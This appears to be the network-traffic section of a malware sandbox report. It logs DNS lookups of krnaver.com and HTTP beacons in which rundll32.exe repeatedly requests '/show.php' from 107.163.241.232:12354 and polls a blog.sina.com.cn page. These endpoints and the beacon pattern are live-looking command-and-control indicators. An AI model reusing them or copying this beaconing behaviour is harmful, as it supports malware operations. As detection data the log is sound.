Dec 11, 2024 16:29:38.163604021 CET	192.168.2.7	1.1.1.1	0x3f64	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:43.751810074 CET	192.168.2.7	1.1.1.1	0x40a	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:48.163280010 CET	192.168.2.7	1.1.1.1	0x578f	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:53.176417112 CET	192.168.2.7	1.1.1.1	0xce2d	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:58.163691998 CET	192.168.2.7	1.1.1.1	0xdf50	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:03.177546024 CET	192.168.2.7	1.1.1.1	0xd509	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:08.169487000 CET	192.168.2.7	1.1.1.1	0x93c5	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:13.163069963 CET	192.168.2.7	1.1.1.1	0x9ac3	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:18.163994074 CET	192.168.2.7	1.1.1.1	0xe89e	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:23.177699089 CET	192.168.2.7	1.1.1.1	0x79a3	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:28.589804888 CET	192.168.2.7	1.1.1.1	0x7522	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:29.040386915 CET	192.168.2.7	1.1.1.1	0x4122	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:29.225537062 CET	192.168.2.7	1.1.1.1	0x4122	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:33.214951038 CET	192.168.2.7	1.1.1.1	0x725	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:38.163326025 CET	192.168.2.7	1.1.1.1	0x33ce	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:43.163589954 CET	192.168.2.7	1.1.1.1	0x7dc8	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:48.166336060 CET	192.168.2.7	1.1.1.1	0xe63f	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:53.167958021 CET	192.168.2.7	1.1.1.1	0xf117	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:58.163026094 CET	192.168.2.7	1.1.1.1	0xc3ea	Standard query (0)	krnaver.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 16:27:05.359375954 CET	1.1.1.1	192.168.2.7	0xd3e0	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 16:27:05.359375954 CET	1.1.1.1	192.168.2.7	0xd3e0	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:28:11.434941053 CET	1.1.1.1	192.168.2.7	0x76a7	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 16:28:11.434941053 CET	1.1.1.1	192.168.2.7	0x76a7	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:29:21.105952978 CET	1.1.1.1	192.168.2.7	0xbca6	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 16:29:21.105952978 CET	1.1.1.1	192.168.2.7	0xbca6	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:29.746932983 CET	1.1.1.1	192.168.2.7	0x4122	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 16:30:29.746932983 CET	1.1.1.1	192.168.2.7	0x4122	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Dec 11, 2024 16:30:29.747040033 CET	1.1.1.1	192.168.2.7	0x4122	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 16:30:29.747040033 CET	1.1.1.1	192.168.2.7	0x4122	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

blog.sina.com.cn

107.163.241.232:12354

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49734	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:04.523082018 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49735	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:04.531306028 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49748	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:05.486073971 CET	118	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn
Dec 11, 2024 16:27:07.048930883 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:06 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49757	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:06.828243971 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49760	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:06.978789091 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49777	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:08.509687901 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49779	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:08.629601955 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49780	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:08.644906044 CET	118	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn
Dec 11, 2024 16:27:10.303637028 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:10 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49796	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:10.872948885 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49799	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:11.003299952 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49819	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:12.539670944 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49822	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:12.702116013 CET	118	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn
Dec 11, 2024 16:27:14.264381886 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:14 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49821	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:12.702569962 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49838	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:14.766047001 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49840	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:14.925379038 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49853	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:17.417006016 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49859	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:17.620645046 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49860	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:17.622561932 CET	118	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn
Dec 11, 2024 16:27:19.193589926 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:18 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49879	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:19.607882023 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49881	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:20.376434088 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49895	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:21.548589945 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49897	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:21.661674976 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49898	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:21.680483103 CET	118	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn
Dec 11, 2024 16:27:23.244754076 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:22 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49917	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:24.174278975 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49920	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:24.435442924 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49935	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:25.565784931 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49937	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:25.721906900 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49938	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:25.727278948 CET	118	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn
Dec 11, 2024 16:27:27.294224024 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:27 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49952	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:27.905407906 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49959	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:28.443994045 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49975	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:30.139930010 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49984	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:30.672221899 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49990	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:31.168905020 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49999	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:32.018913984 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	50001	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:32.134852886 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
